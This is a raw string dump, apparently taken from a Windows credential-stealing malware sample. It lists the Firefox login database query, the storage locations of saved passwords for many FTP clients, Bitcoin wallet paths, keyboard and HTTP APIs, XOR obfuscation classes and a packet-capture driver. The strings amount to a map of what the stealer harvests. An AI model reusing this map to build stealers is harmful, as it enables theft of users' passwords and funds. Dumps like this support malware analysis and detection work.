sqlite3_close
sqlite3_column_blob
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_bytes
sqlite3_prepare
sqlite3_prepare
sqlite3_step
sqlite3_step
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
mozsqlite3.dll
mozsqlite3.dll
sqlite3.dll
sqlite3.dll
sqlite3_open
sqlite3_open
signons.sqlite
signons.sqlite
signons.txt
signons.txt
signons2.txt
signons2.txt
signons3.txt
signons3.txt
\profiles.ini
\profiles.ini
PathToExe
PathToExe
Mozilla\Firefox
Mozilla\Firefox
Firefox
Firefox
Software\Mozilla
Software\Mozilla
SeaMonkey
SeaMonkey
Mozilla\SeaMonkey
Mozilla\SeaMonkey
Mozilla\Profiles
Mozilla\Profiles
remote password
remote password
remote port
remote port
My FTP
My FTP
project.ini
project.ini
klfhuw%$#%fgjlvf
klfhuw%$#%fgjlvf
NDSites.ini
NDSites.ini
FTP .Link\shell\open\command
FTP .Link\shell\open\command
*.fpl
*.fpl
xxx.xiles.net
xxx.xiles.net
ftpsite.ini
ftpsite.ini
NppFTP.xml
NppFTP.xml
nppftp
nppftp
MasterPass
MasterPass
user_pass
user_pass
host_port
host_port
SQLite3
SQLite3
bmk_ftp
bmk_ftp
NovaFTP.db
NovaFTP.db
\INSoftware\NovaFTP
\INSoftware\NovaFTP
SiteInfo.QFP
SiteInfo.QFP
PortNumber
PortNumber
SOFTWARE\Robo-FTP 3.8\FTPServers
SOFTWARE\Robo-FTP 3.8\FTPServers
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\FTPServers
S:"Password"
S:"Password"
D:"Transfer Port"
D:"Transfer Port"
*.ini
*.ini
*.xml
*.xml
Msi.dll
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\SmartFTP
\SmartFTP
Favorites.dat
Favorites.dat
Software\FTPClient\Sites
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
Staff-FTP
Staff-FTP
C87BC961-AAF9-11d2-8A80-0080ADB32FF4
C87BC961-AAF9-11d2-8A80-0080ADB32FF4
sites.db
sites.db
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
\Whisper Technology\FTP Surfer
\Whisper Technology\FTP Surfer
TurboFTP@
TurboFTP@
TurboFTP@usa.net
TurboFTP@usa.net
turboPTF@
turboPTF@
Software\TurboFTP
Software\TurboFTP
\TurboFTP
\TurboFTP
addrbk.dat
addrbk.dat
quick.dat
quick.dat
PassWord
PassWord
Software\South River Technologies\WebDrive\Connections
Software\South River Technologies\WebDrive\Connections
Software\Cryer\WebSitePublisher
Software\Cryer\WebSitePublisher
WinFTP
WinFTP
your.name@your.server.com
your.name@your.server.com
FTPServers.Servers1_FTPServers
FTPServers.Servers1_FTPServers
_PassWord
_PassWord
_Port
_Port
wiseftpsrvs.bin
wiseftpsrvs.bin
wiseftpsrvs.ini
wiseftpsrvs.ini
wisePTF.ini
wisePTF.ini
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
WS_FTP
WS_FTP
\win.ini
\win.ini
Ipswitch\WS_FTP
Ipswitch\WS_FTP
Software\Ghisler\Windows Commander
Software\Ghisler\Windows Commander
\Windows Commander
\Windows Commander
\wcx_PTF.ini
\wcx_PTF.ini
FtpIniName
FtpIniName
*.xfp
*.xfp
FAR Manager FTP
FAR Manager FTP
Windows/Total Commander
Windows/Total Commander
TurboFTP
TurboFTP
WebSitePublisher
WebSitePublisher
SoftX FTP Client
SoftX FTP Client
LeapFTP
LeapFTP
32bit FTP
32bit FTP
FTP Control
FTP Control
CuteFTP
CuteFTP
FFFTP
FFFTP
Core FTP
Core FTP
WebDrive
WebDrive
Classic FTP
Classic FTP
FTP Explorer
FTP Explorer
SmartFTP
SmartFTP
FreeFTP/DirectFTP
FreeFTP/DirectFTP
FTPRush
FTPRush
FTPGetter
FTPGetter
ALFTP
ALFTP
3DFTP
3DFTP
XFTP
XFTP
TFTPInfo
TFTPInfo
MyFTP
MyFTP
NovaFTP
NovaFTP
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
crypt32.dll
crypt32.dll
%Documents and Settings%
%Documents and Settings%
\Application Data\Bitcoin\wallet.dat
\Application Data\Bitcoin\wallet.dat
C:\Users
C:\Users
\AppData\Roaming\Bitcoin\wallet.dat
\AppData\Roaming\Bitcoin\wallet.dat
GetKeyboardState
GetKeyboardState
SetKeyboardState
SetKeyboardState
KeySize
KeySize
: this object does't support a special last block
: this object does't support a special last block
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes
: this object doesn't support multiple channels
: this object doesn't support multiple channels
is not a valid key length
is not a valid key length
InvertibleRSAFunction: computational error during private key operation
InvertibleRSAFunction: computational error during private key operation
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
TF_SignerBase: the recoverable message part is too long for the given key and algorithm
TF_SignerBase: the recoverable message part is too long for the given key and algorithm
for this key
for this key
: this key is too short to encrypt any messages
: this key is too short to encrypt any messages
for this public key
for this public key
PK_Signer: key too short for this signature scheme
PK_Signer: key too short for this signature scheme
operation failed with error
operation failed with error
?#%X.y
?#%X.y
.?AVwindows_file_codecvt@@
.?AVwindows_file_codecvt@@
zcÃ
zcÃ
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$sp_ms_deleter@V?$connection@Vhttp_simple_client@http@net_utils@@@net_keys@@@detail@boost@@
.?AV?$sp_ms_deleter@V?$connection@Vhttp_simple_client@http@net_utils@@@net_keys@@@detail@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AVmoniker_helper@monkeys@@
.?AVmoniker_helper@monkeys@@
.?AVmonkey_swap_nibbles@monkeys@@
.?AVmonkey_swap_nibbles@monkeys@@
.?AVmonkey_xor@monkeys@@
.?AVmonkey_xor@monkeys@@
.?AVmonkey_running_xor@monkeys@@
.?AVmonkey_running_xor@monkeys@@
.?AVmonkey_swap@monkeys@@
.?AVmonkey_swap@monkeys@@
.?AVmonkey_reverse@monkeys@@
.?AVmonkey_reverse@monkeys@@
.?AVmonkey_roll_n@monkeys@@
.?AVmonkey_roll_n@monkeys@@
.?AVmonkey_bits_pack@monkeys@@
.?AVmonkey_bits_pack@monkeys@@
.?AVmonkey_wave@monkeys@@
.?AVmonkey_wave@monkeys@@
.?AV?$bind_t@_NV?$mf4@_NVhttp_simple_client@http@net_utils@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@HII@_mfi@boost@@V?$list5@U?$arg@$00@boost@@V?$value@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@_bi@2@V?$value@H@42@V542@V542@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NV?$mf4@_NVhttp_simple_client@http@net_utils@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@HII@_mfi@boost@@V?$list5@U?$arg@$00@boost@@V?$value@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@_bi@2@V?$value@H@42@V542@V542@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NV?$mf2@_NV?$proxy@Vhttp_simple_client@http@net_utils@@@net_keys@@II@_mfi@boost@@V?$list3@V?$value@PAV?$proxy@Vhttp_simple_client@http@net_utils@@@net_keys@@@_bi@boost@@V?$value@I@23@V423@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NV?$mf2@_NV?$proxy@Vhttp_simple_client@http@net_utils@@@net_keys@@II@_mfi@boost@@V?$list3@V?$value@PAV?$proxy@Vhttp_simple_client@http@net_utils@@@net_keys@@@_bi@boost@@V?$value@I@23@V423@@_bi@3@@_bi@boost@@
.?AV?$typeid_wrapper@V?$socket_acceptor_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$socket_acceptor_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$bind_t@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$cmf0@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Vreg_keys_holder@reg_win@@@_mfi@boost@@V?$list1@U?$arg@$00@boost@@@_bi@5@@_bi@boost@@
.?AV?$bind_t@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$cmf0@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Vreg_keys_holder@reg_win@@@_mfi@boost@@V?$list1@U?$arg@$00@boost@@@_bi@5@@_bi@boost@@
.?AV?$bind_t@_NP6A_NAAVholder_key@reg_win@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVparser_holder@ftp_locker@ftp_parser@@@ZV?$list3@U?$arg@$00@boost@@U?$arg@$01@2@V?$value@Vparser_holder@ftp_locker@ftp_parser@@@_bi@2@@_bi@boost@@@_bi@boost@@
.?AV?$bind_t@_NP6A_NAAVholder_key@reg_win@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVparser_holder@ftp_locker@ftp_parser@@@ZV?$list3@U?$arg@$00@boost@@U?$arg@$01@2@V?$value@Vparser_holder@ftp_locker@ftp_parser@@@_bi@2@@_bi@boost@@@_bi@boost@@
.?AV?$bind_t@_NP6A_NAAVholder_key@reg_win@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@11ABVparser_holder@ftp_locker@ftp_parser@@@ZV?$list5@U?$arg@$00@boost@@U?$arg@$01@2@V?$value@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@_bi@2@V452@V?$value@Vparser_holder@ftp_locker@ftp_parser@@@52@@_bi@boost@@@_bi@boost@@
.?AV?$bind_t@_NP6A_NAAVholder_key@reg_win@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@11ABVparser_holder@ftp_locker@ftp_parser@@@ZV?$list5@U?$arg@$00@boost@@U?$arg@$01@2@V?$value@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@_bi@2@V452@V?$value@Vparser_holder@ftp_locker@ftp_parser@@@52@@_bi@boost@@@_bi@boost@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.?AVPublicKeyAlgorithm@CryptoPP@@
.?AVPublicKeyAlgorithm@CryptoPP@@
.?AVPrivateKeyAlgorithm@CryptoPP@@
.?AVPrivateKeyAlgorithm@CryptoPP@@
.?AVPrivateKey@CryptoPP@@
.?AVPrivateKey@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPrivateKey@CryptoPP@@@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPrivateKey@CryptoPP@@@CryptoPP@@
.?AVPKCS8PrivateKey@CryptoPP@@
.?AVPKCS8PrivateKey@CryptoPP@@
.?AVPublicKey@CryptoPP@@
.?AVPublicKey@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPublicKey@CryptoPP@@@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPublicKey@CryptoPP@@@CryptoPP@@
.?AVX509PublicKey@CryptoPP@@
.?AVX509PublicKey@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.PAVRSAFunction@CryptoPP@@
.PAVRSAFunction@CryptoPP@@
.PAVInvertibleRSAFunction@CryptoPP@@
.PAVInvertibleRSAFunction@CryptoPP@@
.PBVPrimeSelector@CryptoPP@@
.PBVPrimeSelector@CryptoPP@@
.?AVInvalidKeyLength@PK_SignatureScheme@CryptoPP@@
.?AVInvalidKeyLength@PK_SignatureScheme@CryptoPP@@
.?AVKeyTooShort@PK_SignatureScheme@CryptoPP@@
.?AVKeyTooShort@PK_SignatureScheme@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$00$0BAA@$00$03$0A@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$00$0BAA@$00$03$0A@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@VARC4_Base@Weak1@CryptoPP@@V123@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@VARC4_Base@Weak1@CryptoPP@@V123@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@VARC4_Base@Weak1@CryptoPP@@V123@@CryptoPP@@VARC4_Base@Weak1@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@VARC4_Base@Weak1@CryptoPP@@V123@@CryptoPP@@VARC4_Base@Weak1@2@@CryptoPP@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe
%WinDir%
%WinDir%
%System%\drivers\
%System%\drivers\
%System%\
%System%\
CreateIoCompletionPort
CreateIoCompletionPort
GetWindowsDirectoryA
GetWindowsDirectoryA
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegCreateKeyExA
RegCreateKeyExA
RegEnumKeyExA
RegEnumKeyExA
MapVirtualKeyA
MapVirtualKeyA
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
InternetCrackUrlA
InternetCrackUrlA
HttpQueryInfoA
HttpQueryInfoA
%m5V%L%d%h%w%9º"1@f[:B
%m5V%L%d%h%w%9º"1@f[:B
3,#9'/($*
3,#9'/($*
]
]
.-/&00((00
.-/&00((00
5-9,0000
5-9,0000
###03# 1#
###03# 1#
!&]#### -###))558)
!&]#### -###))558)
##-;##=4--#
##-;##=4--#
# 0-\# ; ;####3
# 0-\# ; ;####3
[5#>=@5#
[5#>=@5#
#)0#3#>#
#)0#3#>#
###66## .
###66## .
# #-#1?6)
# #-#1?6)
"- -#%-)
"- -#%-)
(88($(80@
(88($(80@
8$,$ $0 80(,,
8$,$ $0 80(,,
,4840$,(\8$$@(
,4840$,(\8$$@(
.reloc
.reloc
F).sB
F).sB
';ð
';ð
4840$(\.$@
4840$(\.$@
DNSAPI.dll
DNSAPI.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
MSWSOCK.dll
MSWSOCK.dll
OLEAUT32.dll
OLEAUT32.dll
PSAPI.DLL
PSAPI.DLL
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
.BBJBBJ
.BBJBBJ
!(.Mj
!(.Mj
\Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\
\Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\
\Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
\Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
\Registry\Machine\System\CurrentControlSet\Services\Tcpip\Linkage
\Registry\Machine\System\CurrentControlSet\Services\Tcpip\Linkage
npf.sys (NT5/6 x86) Kernel Driver
npf.sys (NT5/6 x86) Kernel Driver
4.1.0.1753
4.1.0.1753
5755555555
5755555555
5555555
5555555
577777555555
577777555555
0000001111111
0000001111111
11111122222222
11111122222222
6666668
6666668
88888888
88888888
,-./0123456789
,-./0123456789
$567$$=>
$567$$=>
.pqrst
.pqrst
$%&'()* ,
$%&'()* ,
wpcap.dll Dynamic Link Library - based on libpcap 1.0rel0b branch (20091008)
wpcap.dll Dynamic Link Library - based on libpcap 1.0rel0b branch (20091008)
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
TcpIp
TcpIp
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Services\Tcpip\Linkage
SYSTEM\CurrentControlSet\Services\Tcpip\Linkage
drivers\NPF.sys
drivers\NPF.sys
airpcap.dll
airpcap.dll
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\FileVersion
PACKET.DLL
PACKET.DLL
packet.dll (NT5) Dynamic Link Library
packet.dll (NT5) Dynamic Link Library
abe2869f-9b47-4cd9-a358-c22904dba7f7
abe2869f-9b47-4cd9-a358-c22904dba7f7